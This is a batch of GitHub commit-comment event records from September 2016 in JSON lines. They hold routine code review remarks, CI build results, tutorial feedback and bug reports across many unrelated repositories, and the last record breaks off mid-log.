{"id":"4543025268","type":"CommitCommentEvent","actor":{"login":"rishig"},"repo":{"name":"timabbott/zulip"},"payload":{"comment":{"id":18971642,"position":null,"line":null,"path":null,"commit_id":"e7beba78ea3f62b4420f872697d3c3c97bd2c92f","created_at":"2016-09-09T23:53:04Z","updated_at":"2016-09-09T23:53:04Z","body":"Put some proposed changes at https://github.com/rishig/zulip/commit/49dd73cb4cdb7e10db50f3d674d2c2bb5cfde3bc"}},"created_at":"2016-09-09T23:53:04Z"}
{"id":"4543025998","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18971648,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T23:53:20Z","updated_at":"2016-09-09T23:53:20Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2362 of 2368 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.75%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T23:53:20Z"}
{"id":"4543026644","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971651,"position":16,"line":5,"path":"docs/01_introduction.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:53:38Z","updated_at":"2016-09-09T23:53:38Z","body":"This is an updated version of the classic Write Yourself a Scheme in 48 hours.\r\n\r\nLinks are ugly use the []() notation in Markdown to turn text into links."}},"created_at":"2016-09-09T23:53:38Z"}
{"id":"4543028109","type":"CommitCommentEvent","actor":{"login":"blackdrag"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":18971653,"position":43,"line":43,"path":"src/main/org/apache/groovy/metaclass/Realm.java","commit_id":"9be5459c906ba106f235d40ebe0f25b7193a0467","created_at":"2016-09-09T23:54:16Z","updated_at":"2016-09-09T23:54:16Z","body":"feedback is welcome. as for the header... looks like we have a misconfiguration in our build then, since I am using what is defined by the gradle build. As for the missing <?>, yeah, that can be added. Frankly it is not of any real use, but well, doesn´t hurt either.\r\nRealm should be more understood as a replacement for MetaClassRegistry. ClassInfo and MetaClass I want to merge into one structure. As with realms a class can have only one meta class per realm, there is no reason to have ClassInfo and MetaClass separated."}},"created_at":"2016-09-09T23:54:16Z"}
{"id":"4543028525","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18971655,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T23:54:27Z","updated_at":"2016-09-09T23:54:27Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T23:54:27Z"}
{"id":"4543031826","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971659,"position":37,"line":30,"path":"docs/01_introduction.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:55:45Z","updated_at":"2016-09-09T23:55:45Z","body":"Before we go further we need to understand Scheme before we can write an interpreter for it.\r\nparentheses\r\nprocedure call"}},"created_at":"2016-09-09T23:55:45Z"}
{"id":"4543036921","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971672,"position":41,"line":34,"path":"docs/01_introduction.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:57:57Z","updated_at":"2016-09-09T23:57:57Z","body":"You need to explain all of this like the person has never learned Scheme. Teaching Scheme is fast since it's a small language. You need to explain the basics of Scheme, the special forms you'll actually be using, and explain functional vs iterative.\r\n\r\nRemember as simple as possible but effective. Assume the user knows nothing. They've never read any of this stuff before and don't understand languages. That's why you're teaching them. "}},"created_at":"2016-09-09T23:57:57Z"}
{"id":"4543038172","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"python-progress/python-progress"},"payload":{"comment":{"id":18971676,"position":null,"line":null,"path":null,"commit_id":"4691a1efdcd8cbe4bc66d586307daf6505f21db4","created_at":"2016-09-09T23:58:29Z","updated_at":"2016-09-09T23:58:29Z","body":"@aduriseti thanks for this comment!  Yeah, I'd be glad to accept your PR here, too.  That being said, I would be careful to recognize what really causes the I/O.  Calling update() is basically just a function call.  If there is some issue with I/O, I would think it is because the 'update()' callback does a lot of stuff (but that also means that the \"max-frequency\" filter might be done directly in callback.\r\n\r\nIf we could make this optional, I would be super comfortable with your fix, but I'm open to discussion :)"}},"created_at":"2016-09-09T23:58:29Z"}
{"id":"4543038583","type":"CommitCommentEvent","actor":{"login":"mgattozzi"},"repo":{"name":"write-you-a-scheme-v2/scheme"},"payload":{"comment":{"id":18971678,"position":43,"line":36,"path":"docs/01_introduction.md","commit_id":"6a4e64658c07afc723a49d9085315b654d3bc558","created_at":"2016-09-09T23:58:39Z","updated_at":"2016-09-09T23:58:39Z","body":"not essentially. It either is or is not."}},"created_at":"2016-09-09T23:58:39Z"}
{"id":"4543038700","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18971679,"position":null,"line":null,"path":null,"commit_id":"fa7586d7bd4e55017e63fdd955de2e4c782f2be2","created_at":"2016-09-09T23:58:42Z","updated_at":"2016-09-09T23:58:42Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa7586d7bd4e55017e63fdd955de2e4c782f2be2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-09T23:58:42Z"}
{"id":"4537873664","type":"CommitCommentEvent","actor":{"login":"philfreo"},"repo":{"name":"closeio/grunt-contrib-qunit"},"payload":{"comment":{"id":18956881,"position":14,"line":178,"path":"tasks/qunit.js","commit_id":"4780d55d97da7a097490935abc9df072d0d28e74","created_at":"2016-09-09T03:00:08Z","updated_at":"2016-09-09T03:00:08Z","body":"@robertmesserle Would there be no way to listen for this grunt event that is already emitted somewhere (from the Gruntfile or anywhere else in our codebase)?"}},"created_at":"2016-09-09T03:00:08Z"}
{"id":"4537876922","type":"CommitCommentEvent","actor":{"login":"fdinoff"},"repo":{"name":"chrisbra/changesPlugin"},"payload":{"comment":{"id":18956887,"position":4,"line":14,"path":"autoload/changes.vim","commit_id":"ab2155ba90551fc260548236e413aae2ea79d909","created_at":"2016-09-09T03:01:13Z","updated_at":"2016-09-09T03:01:13Z","body":"This should probably s:signcolumn"}},"created_at":"2016-09-09T03:01:13Z"}
{"id":"4537881374","type":"CommitCommentEvent","actor":{"login":"philfreo"},"repo":{"name":"closeio/grunt-contrib-qunit"},"payload":{"comment":{"id":18956894,"position":null,"line":null,"path":null,"commit_id":"4780d55d97da7a097490935abc9df072d0d28e74","created_at":"2016-09-09T03:03:01Z","updated_at":"2016-09-09T03:03:01Z","body":"@robertmesserle Also, did you see https://github.com/gruntjs/grunt-contrib-qunit/pull/127 ? Would that do what we needed? "}},"created_at":"2016-09-09T03:03:01Z"}
{"id":"4537882028","type":"CommitCommentEvent","actor":{"login":"ahuazhu"},"repo":{"name":"ahuazhu/web"},"payload":{"comment":{"id":18956896,"position":null,"line":null,"path":null,"commit_id":"f165ebac8514fe4bcd6b39e13ac4862473f6bb1b","created_at":"2016-09-09T03:03:16Z","updated_at":"2016-09-09T03:03:16Z","body":" 你这个根本没有用到 MyBatista嘛！你要follow之前的模式啊。"}},"created_at":"2016-09-09T03:03:16Z"}
{"id":"4537883643","type":"CommitCommentEvent","actor":{"login":"asingh8c"},"repo":{"name":"asingh8c/Codewarriors_Asg3"},"payload":{"comment":{"id":18956901,"position":null,"line":null,"path":null,"commit_id":"cd81ea5ab12bd142a34bc7ffebd04027fee7d1ca","created_at":"2016-09-09T03:03:55Z","updated_at":"2016-09-09T03:03:55Z","body":"check spelling and also directory location for file"}},"created_at":"2016-09-09T03:03:55Z"}
{"id":"4537884109","type":"CommitCommentEvent","actor":{"login":"beckyricha"},"repo":{"name":"beckyricha/Broadlink-RM-SmartThings-Alexa"},"payload":{"comment":{"id":18956902,"position":null,"line":null,"path":null,"commit_id":"62f4e2eb22d7031b27f01fa42dbf53e8549234f7","created_at":"2016-09-09T03:04:08Z","updated_at":"2016-09-09T03:04:08Z","body":"I will be interested to try this when i have time as I've tried to insert delays and multiple hub commands before using the same method here and it never worked on my hub.  Is this working code for you? Also would you mind commenting your code to explain why you have added new commands onphysical and offphysical? It is also quite confusing to see so much code left in but commented out. Is there a reason it needs to remain in? (Such as to provide people with options?) I hope to try some of this this weekend but would like to understand better what it is trying to do, at least the \"physical\" and version stuff. Thanks again for adding to this effort."}},"created_at":"2016-09-09T03:04:08Z"}
{"id":"4537884718","type":"CommitCommentEvent","actor":{"login":"donlantican"},"repo":{"name":"JohnUrban/DBG2OLC"},"payload":{"comment":{"id":18956909,"position":5,"line":5,"path":"utility/split_and_run_sparc.2.sh","commit_id":"bf12b6b616841dec8eb6564d9df5444eeab3ecad","created_at":"2016-09-09T03:04:22Z","updated_at":"2016-09-09T03:04:22Z","body":"i guess this should be 'if' instead of 'f', right? Thanks!"}},"created_at":"2016-09-09T03:04:22Z"}
{"id":"4537885557","type":"CommitCommentEvent","actor":{"login":"ahuazhu"},"repo":{"name":"ahuazhu/web"},"payload":{"comment":{"id":18956912,"position":null,"line":null,"path":null,"commit_id":"bc9815eb9b8473e0953839820a5463704bdb3959","created_at":"2016-09-09T03:04:43Z","updated_at":"2016-09-09T03:04:43Z","body":"先理解当前的代码结构。分层，分模块设计。"}},"created_at":"2016-09-09T03:04:43Z"}
{"id":"4537891379","type":"CommitCommentEvent","actor":{"login":"Arpita307"},"repo":{"name":"Arpita307/new1"},"payload":{"comment":{"id":18956946,"position":null,"line":null,"path":null,"commit_id":"59d46ad386b6c34289d55f31323d10383cf76a32","created_at":"2016-09-09T03:07:02Z","updated_at":"2016-09-09T03:07:02Z","body":"added two lines to the file"}},"created_at":"2016-09-09T03:07:02Z"}
{"id":"4537892961","type":"CommitCommentEvent","actor":{"login":"rangeroob"},"repo":{"name":"rangeroob/b-is-4-blog"},"payload":{"comment":{"id":18956950,"position":null,"line":null,"path":null,"commit_id":"75dcfb666fa2062947bf58100e44ae5f4c4bbabc","created_at":"2016-09-09T03:07:38Z","updated_at":"2016-09-09T03:07:38Z","body":"add date "}},"created_at":"2016-09-09T03:07:38Z"}
{"id":"4537895613","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/romo"},"payload":{"comment":{"id":18956957,"position":null,"line":null,"path":null,"commit_id":"0ecedca11355099301e9c212d7eace325090a655","created_at":"2016-09-09T03:08:40Z","updated_at":"2016-09-09T03:08:40Z","body":"/cc @jcredding "}},"created_at":"2016-09-09T03:08:40Z"}
{"id":"4537896503","type":"CommitCommentEvent","actor":{"login":"huhuanming"},"repo":{"name":"ThreeBearsDan/MeiQNetCheck"},"payload":{"comment":{"id":18956959,"position":13,"line":8,"path":"README.md","commit_id":"e8bffb44dcb7875343fee00ae6b03ff708cb8caa","created_at":"2016-09-09T03:09:01Z","updated_at":"2016-09-09T03:09:01Z","body":"NDS？\r\n![image](https://cloud.githubusercontent.com/assets/5743863/18374203/8e852428-767d-11e6-857d-199a8ea674ed.png)\r\n\r\n还是 DNS ?\r\n![image](https://cloud.githubusercontent.com/assets/5743863/18374240/c92b9d3c-767d-11e6-9770-bb6d65a3d5fa.png)\r\n"}},"created_at":"2016-09-09T03:09:01Z"}
{"id":"4537901654","type":"CommitCommentEvent","actor":{"login":"joewadcan-test"},"repo":{"name":"joewadcan-test/demoapp"},"payload":{"comment":{"id":18956977,"position":4,"line":3,"path":"README.md","commit_id":"8561d257045cd2e7d65333219459f7316034082e","created_at":"2016-09-09T03:11:00Z","updated_at":"2016-09-09T03:11:00Z","body":"Great change that joe guy dumb 💥  👍 "}},"created_at":"2016-09-09T03:11:00Z"}
{"id":"4537901838","type":"CommitCommentEvent","actor":{"login":"bboyryu"},"repo":{"name":"bboyryu/demoapp"},"payload":{"comment":{"id":18956978,"position":null,"line":null,"path":null,"commit_id":"534acc2548a712fb31c25492fe9ecc2870adbc13","created_at":"2016-09-09T03:11:05Z","updated_at":"2016-09-09T03:11:05Z","body":"great change"}},"created_at":"2016-09-09T03:11:05Z"}
{"id":"4537903135","type":"CommitCommentEvent","actor":{"login":"MakerAsgroi"},"repo":{"name":"MakerAsgroi/demoapp"},"payload":{"comment":{"id":18956981,"position":3,"line":3,"path":"README.md","commit_id":"e8ee03763b6b2d3379a8328f566f2eb3a757bc5b","created_at":"2016-09-09T03:11:33Z","updated_at":"2016-09-09T03:11:33Z","body":"Awesome. Really going to push the needle "}},"created_at":"2016-09-09T03:11:33Z"}
{"id":"4537905914","type":"CommitCommentEvent","actor":{"login":"thp1997"},"repo":{"name":"ferhung-mtk/android_system_sepolicy"},"payload":{"comment":{"id":18956987,"position":null,"line":null,"path":null,"commit_id":"7f04f14ea5ec8daace2ac9c405e8b3bd5a23b3ca","created_at":"2016-09-09T03:12:41Z","updated_at":"2016-09-09T03:12:41Z","body":"Bro, will those sepolicy hacks can be useful for mt6592 or 82."}},"created_at":"2016-09-09T03:12:41Z"}
{"id":"4537906578","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/romo"},"payload":{"comment":{"id":18956991,"position":null,"line":null,"path":null,"commit_id":"6ed49551279326fb67b3867c0a100c304edf508a","created_at":"2016-09-09T03:12:57Z","updated_at":"2016-09-09T03:12:57Z","body":"/cc @jcredding I did a major release since I remove dassets-erb, FYI"}},"created_at":"2016-09-09T03:12:57Z"}
{"id":"4537907407","type":"CommitCommentEvent","actor":{"login":"garex"},"repo":{"name":"garex/php-ad-hoc-polymorphism-polyfill"},"payload":{"comment":{"id":18956994,"position":5,"line":5,"path":"src/Polycall.php","commit_id":"f215c07e130919ce4d6b1a92f6e8b98478ee339d","created_at":"2016-09-09T03:13:17Z","updated_at":"2016-09-09T03:13:17Z","body":"WTF?"}},"created_at":"2016-09-09T03:13:17Z"}
{"id":"4537910562","type":"CommitCommentEvent","actor":{"login":"garex"},"repo":{"name":"garex/php-ad-hoc-polymorphism-polyfill"},"payload":{"comment":{"id":18957002,"position":4,"line":6,"path":"src/Polycall.php","commit_id":"1be55f6d55f7dbc4ffe4f3714e38768c0be5363d","created_at":"2016-09-09T03:14:29Z","updated_at":"2016-09-09T03:14:29Z","body":"And this??"}},"created_at":"2016-09-09T03:14:29Z"}
{"id":"4537913991","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18957013,"position":null,"line":null,"path":null,"commit_id":"ce0458aa4eddaa65dbec54ece0e1b96d2ca1ec5c","created_at":"2016-09-09T03:15:50Z","updated_at":"2016-09-09T03:15:50Z","body":"i forgot to add that this happens only when there is no savefile or pfix=ram\r\nthere is a discussion about this in the slacko700 alpha thread.. \r\nhttp://murga-linux.com/puppy/viewtopic.php?t=108017&start=173"}},"created_at":"2016-09-09T03:15:50Z"}
{"id":"4537924994","type":"CommitCommentEvent","actor":{"login":"Not-the-same-sky"},"repo":{"name":"WeApes/NTPaprSEng"},"payload":{"comment":{"id":18957061,"position":null,"line":null,"path":null,"commit_id":"ee392c31acc59dca25137e49dd523967acaa7edc","created_at":"2016-09-09T03:20:18Z","updated_at":"2016-09-09T03:20:18Z","body":"存日志到数据库是分三个部分的过程，一个是插入URL，文章所在的第几篇和总的数量，第二个是更新是否成功，成功数和失败数，第三个就是给每个更新平均爬取时间"}},"created_at":"2016-09-09T03:20:18Z"}
{"id":"4537927288","type":"CommitCommentEvent","actor":{"login":"lspector"},"repo":{"name":"lverns/Clojush"},"payload":{"comment":{"id":18957072,"position":null,"line":null,"path":null,"commit_id":"6c39e9331915759d31ec19d29194be9cee58d028","created_at":"2016-09-09T03:21:13Z","updated_at":"2016-09-09T03:21:13Z","body":"I'm not sure I understand 100% or this, but if at least two sets of eyes (especially if one set is Nic's) have looked at it and deemed it not to break anything, then go ahead and issue a pull request that I'll merge."}},"created_at":"2016-09-09T03:21:13Z"}
{"id":"4537928062","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18957074,"position":null,"line":null,"path":null,"commit_id":"16165072b331161e88fe9abddb8e0eab7be93227","created_at":"2016-09-09T03:21:33Z","updated_at":"2016-09-09T03:21:33Z","body":"Damn, file is a lot less bigger now."}},"created_at":"2016-09-09T03:21:33Z"}
{"id":"4537933478","type":"CommitCommentEvent","actor":{"login":"williammorenop"},"repo":{"name":"sandoval-i/Estructuras"},"payload":{"comment":{"id":18957092,"position":null,"line":null,"path":null,"commit_id":"dc7fecbb721bf189f71cab235a030ce2ad4df9a0","created_at":"2016-09-09T03:23:41Z","updated_at":"2016-09-09T03:23:41Z","body":"buena la rata\r\n"}},"created_at":"2016-09-09T03:23:41Z"}
{"id":"4537933650","type":"CommitCommentEvent","actor":{"login":"ToxemicCarton"},"repo":{"name":"ToxemicCarton/superlolicon2"},"payload":{"comment":{"id":18957097,"position":null,"line":null,"path":null,"commit_id":"3942088617c88d4859acb1683a9bec54aa508b84","created_at":"2016-09-09T03:23:44Z","updated_at":"2016-09-09T03:23:44Z","body":"@scrizz Lua doesnt support incrementing like that :C"}},"created_at":"2016-09-09T03:23:44Z"}
{"id":"4537934006","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/historia-web-pt"},"payload":{"comment":{"id":18957098,"position":null,"line":null,"path":null,"commit_id":"c4fae63ab26f3cc94f528f8f5190934ba44a0f69","created_at":"2016-09-09T03:23:52Z","updated_at":"2016-09-09T03:23:52Z","body":"Errei referência. Na verdade, esse aqui é referente ao #18 "}},"created_at":"2016-09-09T03:23:52Z"}
{"id":"4537937490","type":"CommitCommentEvent","actor":{"login":"ShawnLinLoveLife"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957107,"position":44,"line":44,"path":"bootstrap.sh","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-09T03:25:17Z","updated_at":"2016-09-09T03:25:17Z","body":"Thanks! Sorry for this mistake. Midnight is not that good to write the bash."}},"created_at":"2016-09-09T03:25:17Z"}
{"id":"4537937792","type":"CommitCommentEvent","actor":{"login":"robertmesserle"},"repo":{"name":"closeio/grunt-contrib-qunit"},"payload":{"comment":{"id":18957108,"position":14,"line":178,"path":"tasks/qunit.js","commit_id":"4780d55d97da7a097490935abc9df072d0d28e74","created_at":"2016-09-09T03:25:24Z","updated_at":"2016-09-09T03:25:24Z","body":"I haven't come across anything like that yet, but I'll see if I can find something cleaner now that I have a better idea of what I'm looking for.\n\n> On Sep 8, 2016, at 8:00 PM, Phil Freo <notifications@github.com> wrote:\n> \n> @robertmesserle Would there be no way to listen for this grunt event that is already emitted somewhere (from the Gruntfile or anywhere else in our codebase)?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-09T03:25:24Z"}
{"id":"4537939620","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18957115,"position":null,"line":null,"path":null,"commit_id":"d927fd561d17c1461e90fab9971b40e3545a0f2d","created_at":"2016-09-09T03:26:09Z","updated_at":"2016-09-09T03:26:09Z","body":"https://github.com/jtleek/datasharing"}},"created_at":"2016-09-09T03:26:09Z"}
{"id":"4537941143","type":"CommitCommentEvent","actor":{"login":"jigsopari"},"repo":{"name":"jigsopari/Learning-at-dell"},"payload":{"comment":{"id":18957118,"position":null,"line":null,"path":null,"commit_id":"5306d95ac0dc8eefb53fce35ec9f887f3546ad7d","created_at":"2016-09-09T03:26:46Z","updated_at":"2016-09-09T03:26:46Z","body":"All about writing C code in linux"}},"created_at":"2016-09-09T03:26:46Z"}
{"id":"4537942606","type":"CommitCommentEvent","actor":{"login":"rahul286"},"repo":{"name":"rtCamp/rtsocial"},"payload":{"comment":{"id":18957125,"position":null,"line":null,"path":null,"commit_id":"e13b90c905e9eede92cb7a9dad352e43fa0971e5","created_at":"2016-09-09T03:27:22Z","updated_at":"2016-09-09T03:27:22Z","body":"@chandra-patel I am also interested in knowing why this was removed? 🤔"}},"created_at":"2016-09-09T03:27:22Z"}
{"id":"4537943393","type":"CommitCommentEvent","actor":{"login":"robertmesserle"},"repo":{"name":"closeio/grunt-contrib-qunit"},"payload":{"comment":{"id":18957130,"position":null,"line":null,"path":null,"commit_id":"4780d55d97da7a097490935abc9df072d0d28e74","created_at":"2016-09-09T03:27:40Z","updated_at":"2016-09-09T03:27:40Z","body":"This looks like it would definitely solve our problem.\n\n> On Sep 8, 2016, at 8:03 PM, Phil Freo <notifications@github.com> wrote:\n> \n> @robertmesserle Also, did you see gruntjs#127 ? Would that do what we needed?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-09T03:27:40Z"}
{"id":"4537943899","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18957132,"position":null,"line":null,"path":null,"commit_id":"d927fd561d17c1461e90fab9971b40e3545a0f2d","created_at":"2016-09-09T03:27:52Z","updated_at":"2016-09-09T03:27:52Z","body":"![screenshot 23](https://cloud.githubusercontent.com/assets/20018401/18374534/d66acf0c-761b-11e6-8e7b-276846203ea5.png)\r\n"}},"created_at":"2016-09-09T03:27:52Z"}
{"id":"4537944790","type":"CommitCommentEvent","actor":{"login":"loafy"},"repo":{"name":"loafy/GDU"},"payload":{"comment":{"id":18957134,"position":2,"line":2,"path":"README.md","commit_id":"409a17179900e058c1d76e3b557f552c174ff784","created_at":"2016-09-09T03:28:14Z","updated_at":"2016-09-09T03:28:14Z","body":"Intro-to-android app"}},"created_at":"2016-09-09T03:28:14Z"}
{"id":"4537949508","type":"CommitCommentEvent","actor":{"login":"mholt"},"repo":{"name":"sourcegraph/checkup"},"payload":{"comment":{"id":18957148,"position":null,"line":null,"path":null,"commit_id":"df3a626c9226c0d4a8f1291b5d2ff3e676aa5062","created_at":"2016-09-09T03:30:13Z","updated_at":"2016-09-09T03:30:13Z","body":"> you need to modify this IAM user's permissions to scope its access to the Checkup bucket\r\n\r\nIs this possible using their API? If I knew how to do this I would have done it :smile:"}},"created_at":"2016-09-09T03:30:13Z"}
{"id":"4537949999","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"Chikakos/csaitoprogram"},"payload":{"comment":{"id":18957151,"position":null,"line":null,"path":null,"commit_id":"947a5cc369c4f8b5da176afdec2ed7d01311d374","created_at":"2016-09-09T03:30:22Z","updated_at":"2016-09-09T03:30:22Z","body":"> こちら$conなど、わからないコードばかりでphpなのかhtmlなのかもわからず、断念したデータでしたので、「input_page.html」「regist.php」を使い入力を試みました。\r\n\r\nそこあたり最初は判別難しいですよね。\r\n\r\nもしPHPのコードで基本的なことが抜けていて不安があるという状態でしたら、\r\nhttp://www.phpbook.jp/tutorial/\r\nの「関数」までのところか、\r\nドットインストールのPHP講座もありますのでどちらか学びやすいほうを選んでみてください(時間があれば両方オススメしたいです)。\r\nhttp://dotinstall.com/lessons/basic_php_v2\r\n動画の場合、全部みるのは骨が折れるかとおもいますのでみるとしても #16 までが良いかと思います。\r\n\r\n> http://www.flatflag.nir87.com/insert-942\r\n\r\n良い記事なのですが、想定した答えとサンプルのやり方が微妙に違うので(以下あたり)\r\n```\r\n$params = array(':name' => '藤野');\r\n```\r\n今は混乱してしまうかもしれません。いくつかIssueが終わった後に読んでみるといい記事ですかね。提供ありがとうございます！"}},"created_at":"2016-09-09T03:30:22Z"}
{"id":"4537954484","type":"CommitCommentEvent","actor":{"login":"euwbah"},"repo":{"name":"euwbah/sonic-pi-autocomplete"},"payload":{"comment":{"id":18957159,"position":null,"line":null,"path":null,"commit_id":"1890d7c4bd6e8ed3d0391d28f89dc632b91e8af5","created_at":"2016-09-09T03:32:12Z","updated_at":"2016-09-09T03:32:12Z","body":"TODO: Make sure control doesn't suggest uncontrollable params"}},"created_at":"2016-09-09T03:32:12Z"}
{"id":"4537955218","type":"CommitCommentEvent","actor":{"login":"codnee"},"repo":{"name":"noliar/ASP.NET-Core-Sample"},"payload":{"comment":{"id":18957160,"position":null,"line":null,"path":null,"commit_id":"1923fa7448814b16657921232e7217a6eb564899","created_at":"2016-09-09T03:32:31Z","updated_at":"2016-09-09T03:32:31Z","body":".deployment !!!!\r\n\r\nSo, no more heroku? :("}},"created_at":"2016-09-09T03:32:31Z"}
{"id":"4537955435","type":"CommitCommentEvent","actor":{"login":"amirahav"},"repo":{"name":"cloudamatic/mu"},"payload":{"comment":{"id":18957161,"position":null,"line":null,"path":null,"commit_id":"fe8f62e937170921e6204705a54025af157228ec","created_at":"2016-09-09T03:32:36Z","updated_at":"2016-09-09T03:32:36Z","body":"oopsie :-)"}},"created_at":"2016-09-09T03:32:36Z"}
{"id":"4537957606","type":"CommitCommentEvent","actor":{"login":"euwbah"},"repo":{"name":"euwbah/sonic-pi-autocomplete"},"payload":{"comment":{"id":18957165,"position":null,"line":null,"path":null,"commit_id":"1890d7c4bd6e8ed3d0391d28f89dc632b91e8af5","created_at":"2016-09-09T03:33:28Z","updated_at":"2016-09-09T03:33:28Z","body":"TODO: Add snippets for all Sonic Pi blocks"}},"created_at":"2016-09-09T03:33:28Z"}
{"id":"4537957733","type":"CommitCommentEvent","actor":{"login":"naufalizee"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18957167,"position":null,"line":null,"path":null,"commit_id":"6dda1bd1f9f8761744cdd95e921bbcaa50bd66e3","created_at":"2016-09-09T03:33:31Z","updated_at":"2016-09-09T03:33:31Z","body":"i got this eror when managing heroes\r\n\r\n[10:16:14 AM]  Changing objective to: Hero Management\r\n[10:16:16 AM]  Scene: Adventure Start\r\n[10:16:18 AM]  Scene: Heroes\r\n[10:16:18 AM]  Start managing heroes\r\n[10:16:19 AM]  Checking each position for level 30...\r\n[10:16:20 AM]  - Got position: 2\r\n[10:16:22 AM]  - Got position: 3\r\n[10:16:24 AM]  - Got position: 4\r\n[10:16:26 AM]  - Got position: 5\r\n[10:16:31 AM]  Finding heroes...\r\n[10:16:31 AM]  ERROR: Object reference not set to an instance of an object.\r\n[10:16:31 AM]  ERROR: System.NullReferenceException: Object reference not set to an instance of an object.\r\n   at SevenKnightsAI.Classes.SevenKnightsCore.ExpectingScene(SceneType sceneType, Int32 retry, Int32 sleepInterval)\r\n   at SevenKnightsAI.Classes.SevenKnightsCore.ManageHeroes()\r\n   at SevenKnightsAI.Classes.SevenKnightsCore.MainLoop(Object sender, DoWorkEventArgs e)\r\n\r\n\r\nand when key reach 0 the bot stuck \r\n\r\n[10:31:50 AM]  Scene: Adventure Start\r\n[10:31:52 AM]  Scene: Out Of Silver Keys Popup\r\n[10:31:52 AM]  Changing objective to: Gold Chamber\r\n[10:31:54 AM]  Changing objective to: Adventure\r\n[10:31:55 AM]  Changing objective to: Gold Chamber\r\n[10:31:57 AM]  Changing objective to: Adventure\r\n[10:31:59 AM]  Changing objective to: Gold Chamber\r\n[10:32:00 AM]  Changing objective to: Adventure\r\n[10:32:02 AM]  Changing objective to: Gold Chamber\r\n[10:32:03 AM]  Changing objective to: Adventure\r\n[10:32:05 AM]  Changing objective to: Gold Chamber\r\n[10:32:06 AM]  Changing objective to: 